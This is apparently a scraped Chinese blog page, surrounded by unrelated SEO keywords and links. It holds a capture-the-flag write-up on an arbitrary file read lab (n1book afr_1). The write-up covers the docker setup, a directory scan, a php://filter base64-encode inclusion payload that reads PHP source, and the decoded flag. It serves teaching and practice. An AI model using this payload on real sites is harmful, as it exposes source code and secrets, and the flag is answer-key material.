当前位置: 首页 > news >正文

深圳市南山网站建设商标注册网上查询网

深圳市南山网站建设,商标注册网上查询网,郑州做网站推广地,网站建设 山西1.1漏洞描述 漏洞名称任意文件读取漏洞 afr_1漏洞类型文件读取漏洞等级⭐漏洞环境docker攻击方式 1.2漏洞等级 高危 1.3影响版本 暂无 1.4漏洞复现 1.4.1.基础环境 靶场docker工具BurpSuite 1.4.2.靶场搭建 1.创建docker-compose.yml文件 version: 3.2 services: web: …

1.1漏洞描述

漏洞名称任意文件读取漏洞 afr_1
漏洞类型文件读取
漏洞等级
漏洞环境docker
攻击方式

1.2漏洞等级

高危

1.3影响版本

暂无

1.4漏洞复现

1.4.1.基础环境

靶场docker
工具BurpSuite

1.4.2.靶场搭建

        1.创建docker-compose.yml文件

version: '3.2'

services:
  web:
    image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-1:latest
    ports:
      - 80:80

        2.将该代码写入文件

启动方式

docker-compose up -d

flag

n1book{afr_1_solved}

关闭

sudo docker-compose down

        3.访问kali 80端口

        搭建成功 

1.5深度利用

1.5.1漏洞点

  • 1.dirsearch目录扫描

dirsearch --url http://10.9.47.79 

  • 2.查看 /flag.php

  • 3.查看/index.php

  • 发现跳转到 ?p=hello

所以可能是/index.html包含了?p=hello

文件包含

  • 4.使用php://fileter 读取(读取php源码)

?filepath=php://filter/read=convert.base64-encode/resource=[目标文件]

  • 它读取到的结果是base64加密的 

PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9

  • 5.进行base64解码

  • 6.成功拿到flag

n1book{afr_1_solved}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级

  • 打补丁

  • 上设备

http://www.yayakq.cn/news/877617/

相关文章:

  • 传媒网站如何设计做网站的费用计入销售费用吗
  • 工信部个人备案网站可信吗专业图书商城网站建设
  • 河南做网站的费用wordpress与phpstudy
  • html5网站制作实战百度为何不收录你的网站产品页
  • 电商网站 流程图网站建设域名提前买吗
  • 杭州网站维护外包网页设计外文文献
  • 响应式网站建设教程wordpress栏目加密
  • 网络科技公司网站找人给公司做网站去哪找
  • 网站建设询价单有记事本做简易网站
  • 小面网站建设域名能卖多少钱一个
  • 一个完整的网站 技术百度网站建设在哪
  • 凡科网站建设总结网站备案 申请
  • 邯郸网站设计培训优质的广州做网站
  • 怎么自己在百度上做网站湘潭高端网站建设
  • 南充市建设局官方网站中小企业建站服务
  • 杭州萧山门户网站建设公司邢台123网站模板
  • 青木三色品牌商城网站开发学计算机编程需要什么基础
  • 做网站模板的软件网站设计管理方向
  • 郑州网站关键词排名技术代理asp官网
  • 肇庆网站seo网站外链隐形框架
  • 建设银行网站 开户行怎么查询网站被百度蜘蛛爬了多久放出来
  • 网站建设 案例wordpress怎么把分类弄成导航
  • 广安建设企业网站文娱热搜榜
  • 做企业网站类型互联网营销师报考条件
  • 厦门找一家做网站的公司好三河市最新消息
  • 西宁网站建设优化如何建立一个微信公众号平台
  • 网站外链建设设计陕西的网站建设公司排名
  • 网站建设速成班wordpress 不同分类
  • 浅谈高校网站群的建设南通个人网站建设
  • 网站建设杭州滨江wordpress插件音乐